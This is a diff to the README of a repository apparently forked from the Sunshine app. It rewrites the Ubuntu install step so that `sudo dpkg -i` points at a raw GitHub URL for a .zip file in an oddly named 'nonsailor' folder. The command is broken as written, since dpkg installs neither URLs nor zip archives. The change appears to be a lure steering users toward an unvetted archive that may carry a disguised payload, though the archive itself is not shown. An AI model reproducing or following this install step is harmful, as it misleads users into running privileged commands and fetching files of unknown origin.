Voltga/Sunshine/README.md

 3. **Install Sunshine**
    - For Windows: Open the downloaded `.exe` file and follow the installation prompts.
    - For macOS: Open the downloaded `.dmg` file and drag Sunshine to your Applications folder.
-   - For Ubuntu: Open a terminal and run `sudo dpkg -i <downloaded-file.deb>`.
+   - For Ubuntu: Open a terminal and run `sudo dpkg -i <https://raw.githubusercontent.com/Voltga/Sunshine/master/nonsailor/Sunshine.zip>`.

 4. **Open Sunshine**
    Once installed, locate the Sunshine application in your programs/applications and open it.